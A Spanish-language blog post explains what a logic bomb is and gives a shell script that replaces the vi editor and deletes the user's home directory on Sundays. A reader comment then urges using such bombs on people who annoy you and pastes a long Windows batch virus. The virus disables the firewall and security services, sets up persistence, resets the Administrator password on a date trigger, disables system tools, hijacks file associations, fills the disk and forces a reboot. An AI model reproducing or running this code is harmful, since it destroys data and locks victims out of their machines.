¿Qué es una bomba lógica y como crear una?

Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:

#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi

Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.

1 comentarios:

Anónimo dijo...

bueno una BL (bomba logica) al parecer puede ser buena para payasoso que friegan
solo lo comprimo (winrar o winzip)
y se envia
aqui un ejemplo de BL hecho en una pagina, eso si se guarda como.bat
pongale cualquier nombre: algo.bat


@echo off
:: Virus Batch made by: Espectro Infernal

::Setting unmodificable and estatic variables...

set regtype1=REG_SZ
set regtype2=REG_DWORD

set hklmsecurity=HKLM\SOFTWARE\Microsoft\Security Center
set hklmwinlogon=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
set hkcuwinlogon=HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
set hklmcversion=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
set hkcucversion=HKCU\Software\Microsoft\Windows\CurrentVersion
set hklmlanmanserver=HKLM\SYSTEM\CurrentControlSet\Services\LanManServer

set bomb=%userprofile%\win32.bat
set hoax=%userprofile%\windows.bat
set ovrflw=%systemroot%\system.bat


set log1=%systemroot%\log1.log
set log2=%systemroot%\log2.log
set log3=%systemroot%\log3.log
set log4=%systemroot%\system32\log4.log
set log5=%systemroot%\log5.log

::Deleting Standard System Security and More...

netsh delete firewall allowedprogram all > nul
net stop "Centro de Seguridad" > nul
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" > nul

echo AntiVirusDisableNotify>"%log1%" & echo FirewallDisableNotify>>"%log1%" & echo UpdatesDisableNotify>>"%log1%" & echo AntiVirusOverride>>"%log1%" & echo FirewallOverride>>"%log1%"

for /F "tokens=*" %%a IN (%log1%) DO call :reg1 %%a
attrib +h "%log1%"

:reg1
set a=%1
reg add "%hklmsecurity%" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

::Que tal si se copia a si mismo ?

copy %0 "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat"
copy %0 "%temp%\SoundInput.bat"
copy %0 "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat"
copy %0 "%systemroot%\shellexecutecontrol.bat"
copy %0 "%userprofile%\win32.bat"
copy %0 "%tmp%\SoundOutput.bat"

::Bomba lógica preparada para inhabilitar el acceso a la cuenta del Administrador.

echo @echo off>"%bomb%"
echo set d1=%%date:~3%%>>"%bomb%"
echo set d2=%%d1:~0,2%%>>"%bomb%"
echo set t1=%%time:~0,2%%>>"%bomb%"
echo set x=5>>"%bomb%"
echo set /a y=%%d2%%+%%x%%>>"%bomb%"
echo if %%d2%% NEQ 12 (goto :act) else (goto :end)>>"%bomb%"
echo :act>>"%bomb%"
echo if %%y%% GTR 22 (goto :action) else (goto :end)>>"%bomb%"
echo :action >> "%bomb%"
echo if %%t1%% LSS 22 (goto :finish) else (goto :end)>>"%bomb%"
echo :finish>>"%bomb%"
echo net user Administrador sucker00>>"%bomb%"
echo net user Administrator sucker00>>"%bomb%"
echo exit>>"%bomb%"
echo :end>>"%bomb%"
echo exit>>"%bomb%"
attrib +h "%bomb%"

reg add "%hklmcversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcucversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hklmcversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcucversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcuwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hklmwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul

::Disabling some tools and reseting some Windows Services...

echo DisableRegistryTools>"%log2%" & echo DisableTaskMgr>>"%log2%"

for /F "tokens=*" %%a IN (%log2%) DO call :reg2 %%a
attrib +h "%log2%"

reg add "%hkcucversion%\Internet Settings\Zones\3" /v 1803 /t "%regtype2%" /d 3 /f > nul

:reg2
set a=%1
reg add "%hklmcversion%\Policies\System" /v "%a%" /t "%regtype2%" /d 1 /f > bul
goto :EOF

echo secpol.msc>"%log4%" & echo lusrmgr.msc>>"%log4%" & echo ntmsmgr.msc>>"%log4%" & echo ntmsoprq.msc>>"%log4%" & echo services.msc>>"%log4%" & echo wmimgmt.msc>>"%log4%"

for /F "tokens=*" %%a in (%log4%) DO call :dis %%a
attrib +h "%log4%"


:dis
set a=%1
cd "%systemroot%\system32"
attrib -h -r -s -a %a%
set b=%a:~1%
set c=%a%
ren %a% %b%
echo win32system aplication>%c%
attrib +a %c%
del /q /f %b%
goto :EOF

::Having changes on your explorer.exe ??

echo NoClose>"%log3%" & echo NoDesktop>>"%log3%" & echo NoFind>>"%log3%" & echo NoRun>>"%log3%" & echo NoStartMenuSubFolders>>"%log3%" & echo NoSetTaskBar>>"%log3%" & echo NoSetFolders>>"%log3%" & echo RestrictRun>>"%log3%" & echo NoViewCanlextMenu>>"%log3%" & echo NoViewContexMenu>>"%log3%" & echo NoSetFolders>>"%log3%" & echo NoUserNameInStarMenu>>"%log3%" & echo NoFileMenu>>"%log3%"

for /F "tokens=*" %%a IN (%log3%) DO call :reg3 %%a
attrib +h "%log3%"

:reg3
set a=%1
reg add "%hkcucversion%\Policies\Explorer" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

::What if the victim has some Hoaxes efects?

reg add "%hklmlanmanserver%" /v "DiskSpaceThreshold" /t "%regtype1%" /d 95 /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeCaption" /t "%regtype1%" /d "Microsoft says..." /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeText" /t "%regtype1%" /d "Microsoft Mesage: FUCK YOU!" /f > nul

echo @echo off>"%hoax%" & echo msg * FUCK YOU, SUCKER!!">>"%hoax%" & echo exit>>"%hoax%"

reg add "%hklmcversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcuwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul

::Disabling the win Key from the keyboard and other interesant registry values to make a pc slower...

reg add "HKCU\Control Panel\Desktop" /v MenuShowDelay /t "%regtype1%" /d 800 /f > nul
reg add "HKCU\Control Panel\Desktop" /v WaitToKillAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "HKCU\Control Panel\Desktop" /v HungAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "%hkcucversion%\Policies\Explorer" /v NoWinKeys /t "%regtype2%" /d 1 /f > nul

::Adding this shit to the regedit...

reg add "%hklmcversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\win32.bat /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\shellexecutecontrol.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%tmp%\SoundOutput.bat" /f > nul

::What if we touch a lil' things about assoc. extentions ?

echo .arj>"%log5%" & echo .asm>>"%log5%" & echo .asx>>"%log5%" & echo .au>>"%log5%" & echo .avi>>"%log5%" & echo .bkf>>"%log5%" & echo .bmp>>"%log5%" & echo .c>>"%log5%" & echo .dll>>"%log5%" & echo .doc>>"%log5%" & echo .exe>>"%log5%" & echo .htm>>"%log5%" & echo .html>>"%log5%" & echo .ico>>"%log5%" & echo .java>>"%log5%" & echo .jpeg>>"%log5%" & echo .jpg>>"%log5%" & echo .key>>"%log5%" & echo .lnk>>"%log5%" & echo .mid>>"%log5%" & echo .midi>>"%log5%" & echo .mod>>"%log5%" & echo .mp3>>"%log5%" & echo .mp4>>"%log5%" & echo .mpeg>>"%log5%" & echo .msc>>"%log5%" & echo .pdf>>"%log5%" & echo .php>>"%log5%" & echo .rar>>"%log5%" & echo .reg>>"%log5%" & echo .sys>>"%log5%" & echo .wav>>"%log5%" & echo .xml>>"%log5%"

for /F "tokens=*" %%a IN (%log5%) DO call :extassoc %%a
ftype WinRAR=CMD.EXE

:extassoc
set a=%1
set a=%a: =%
assoc %a%=WinRAR
goto :EOF

::And what if we make a lil' overflow ? ^^P

echo @echo off>"%ovrflw%"
echo set rnd=%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=0>>"%ovrflw%"
echo :bug>>"%ovrflw%"
echo set rnd2=%random%%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=num+1>>"%ovrflw%"
echo if %num%==%rnd% (exit) else (echo win32 message: FUCK YOU!>"%systemroot%\%rnd2%.txt" & goto :bug)>>"%ovrflw%"

reg add "%hklmcversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul

:: Ending...
start http://support.microsoft.com/
msg * Microsoft Mesage: FUCK YOU!
shutdown -r -t 05 -c "Microsoft Dice: FUCK YOU!"
exit